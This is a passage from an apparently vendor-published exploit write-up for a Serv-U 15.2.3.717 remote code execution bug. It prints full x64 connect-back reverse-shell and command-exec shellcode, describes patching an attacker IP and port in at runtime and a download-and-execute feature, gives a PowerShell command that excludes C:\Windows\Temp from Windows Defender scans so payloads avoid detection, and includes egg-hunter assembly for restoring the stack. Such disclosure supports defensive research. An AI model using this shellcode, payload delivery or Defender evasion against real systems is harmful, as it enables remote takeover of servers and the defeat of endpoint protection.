"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00"
"PP"   # connect-back port       @ offs 244
"HHHH" # connect-back IP address @ offs 246 
"\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58"
```

My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to use arbitrary shellcode stagers / [Sliver](https://github.com/BishopFox/sliver) instances / Metasploit instances at runtime without having to generate new shellcode every time.

I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:

```
shellcode = (
     b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
     b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
     b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
     b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
     b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
     b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
     b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
     b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
     b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
     b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
     b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
     b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
     b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
     b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
     b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
     b"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
     b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
     b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"
)

rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"
```

Again, this saves the user generating new shellcode every time. Finally I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to `C:\Windows\Temp`, then runs it. One little wrinkle I added is a PowerShell command to disable Windows Defender virus/malware scans from running in `C:\Windows\Temp` so you can run completely unobfuscated [Sliver](https://github.com/BishopFox/sliver)/Meterpreter payloads without getting tripped up by Microsoft endpoint security.

The PowerShell command to do this is:

```powershell
powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"
```

Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or [Sliver](https://github.com/BishopFox/sliver) session.

### I Almost Forgot About Unpivoting the Stack
Sometimes it's necessary to return the stack pointer to whence it came so that the exploited process can resume execution and handle any errors/exceptions tidily. This exploit crashes Serv-U, but it automatically restarts. This is unacceptable in a lot of scenarios and making it not crash is left as an exercise for the reader.

However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") and Process Environment Block ("PEB") via the `gs:` segment register on 64-bit Intel/AMD Windows. These blocks are maintained by the operating system and provide thread-local storage for metadata about running threads.

The TEB starts at `gs:[0]` with a pointer to the PEB at `gs:[0x30]`. The PEB contains the stack starting address at offset `0x10`. The following code can be used to read it:

```
# recover the original stack
mov rax, 0x30
mov rax, qword gs:[rax]     # Read address of PEB out of TEB
add rax, 0x10               # Offset in PEB to pre-exploit stack frame address
mov rax, qword ptr [rax]    # Dereference [rax] to read the stack frame address out of the PEB
mov rdi, rax                # Store address of old stack frame in rdi
```

In order to return `rsp` to the same address it contained at the very beginning of the exploit - at the point when `call r9` first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack frame contains return addresses in `Serv-U.dll`, which as we saw earlier does not support ASLR. As a result I can simply look at a stack trace taken at the point `call r9` is called and make note of the addresses there.

For example, consider this stack trace taken from exactly the scenario just described:

```
0:013> k
 # Child-SP          RetAddr               Call Site
00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
01 0000009d`d2aff380 00000000`7218f41b     LIBEAY32!EVP_rc4_40+0x488
02 0000009d`d2aff3d0 00000000`7210efaa     LIBEAY32!FINGERPRINT_premain+0x291b
03 0000009d`d2aff410 00000001`8016086c     LIBEAY32!EVP_EncryptUpdate+0xda
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
05 0000009d`d2aff4a0 00000001`80141263     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
06 0000009d`d2aff4e0 00000001`80144fb0     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
07 0000009d`d2aff580 00000200`577f8dd7     Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
08 0000009d`d2aff650 00000200`577f8c5c     RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
09 0000009d`d2aff690 00000200`577f6c4e     RhinoNET!CRhinoSocket::OnReceive+0x170
0a 0000009d`d2aff6e0 00000200`577f32eb     RhinoNET!CRhinoProductSocket::OnReceive+0x3e
0b 0000009d`d2aff710 00000200`577f356b     RhinoNET!CAsyncSocketX::DoCallBack+0x107
0c 0000009d`d2aff740 00000200`577f350f     RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
0d 0000009d`d2aff770 00007fff`5ffda399     RhinoNET!CSocketWndX::OnSocketNotify+0x13
0e 0000009d`d2aff7a0 00007fff`5ffd97af     mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698] 
0f 0000009d`d2aff920 00007fff`5ffd7093     mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099] 
10 0000009d`d2aff960 00007fff`5ffd7464     mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265] 
11 0000009d`d2affa50 00007fff`5fe7a509     mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417] 
12 0000009d`d2affa90 00007fff`90c60089     mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299] 
13 0000009d`d2affad0 00007fff`90c5fa02     USER32!UserCallWinProcCheckWow+0x319
14 0000009d`d2affc60 00000001`8016ea75     USER32!DispatchMessageWorker+0x1d2
15 0000009d`d2affce0 00000001`8016eaed     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
16 0000009d`d2affd50 00007fff`8ee36b4c     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
17 0000009d`d2affd80 00007fff`90954ed0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
18 0000009d`d2affdb0 00007fff`9124e20b     KERNEL32!BaseThreadInitThunk+0x10
19 0000009d`d2affde0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b
```

The first Serv-U stack frame is at index #4 and contains the saved return address for the instruction at `Serv_U!CUPnPNotifyEvent::SetTimeout + 0x22b7c`:

```
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
```

The return address is `0x180141795` *and always will be* due to the absence of ASLR. Therefore to find the original stack I just hunt for `0x80141795` (the 4-byte DWORD equivalent of the 5-byte address `0x0180141795`) starting at the address I pulled out of the PEB. I built the following egg hunter:

```
# Egg hunter for the value 0x80141795 starting at the PEB's stack address.
# No egg-not-found error handling because if this code is running then the 
# stack frame we're looking for is guaranteed to exist.
mov eax, 0x80141795           # saved RIP we want to find
mov rcx, 0x4000               # how much memory will we search
cld                           # clear DF, direction flag
repne scasd eax, dword [rdi]  # find the saved stack ptr starting @ [rdi]
mov rax, rdi                  # save the found stack address in rax    
mov rdx, 0x140                # the top of the original stack frame is...
sub rax, rdx                  # ...0x140 bytes upwards
mov rsp, rax                  # pivot to the new (old!) stack
```

You'll notice that some math is being done to subtract 0x140 from `rax` before writing it to `rsp`. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need `rsp` to point at the frame index #0:

```
# Child-SP           RetAddr               Call Site
00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
...
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
```

The offset on the stack between #4 and #0 is `0x9dd2aff460 - 0x9dd2aff320 = 0x140` so I subtract that amount from `rax` before setting the stack pointer, `rsp`.

One of the beautiful things about Radare2 is its ability to turn code into opcodes for shellcode. So the above code becomes:

```
 % cat /tmp/s.asm
mov eax, 0x80141795
mov rcx, 0x4000
cld
repne scasd eax, dword [rdi]
mov rax, rdi
mov rdx, 0x140
sub rax, rdx
mov rsp, rax

% cat /tmp/s.asm | rasm2 -a x86 -b 64 -
b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4
```

Simple and elegant. 

Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.

## In summary
This was a fun exploit and I got lucky a few times! The fact that ASLR was disabled on the Serv-U dll was crazy lucky. 

It should also be pointed out that the exploit is currently hard-coded for Serv-U 15.2.3.717. To build against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in `Serv-U.dll`. Hopefully we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.

Let us know what you think - connect with us on social media and follow us on GitHub for more exploits!

For more information on our continuous offensive security platform, you can get in touch with us via the [Cosmos page](https://bishopfox.com/platform).
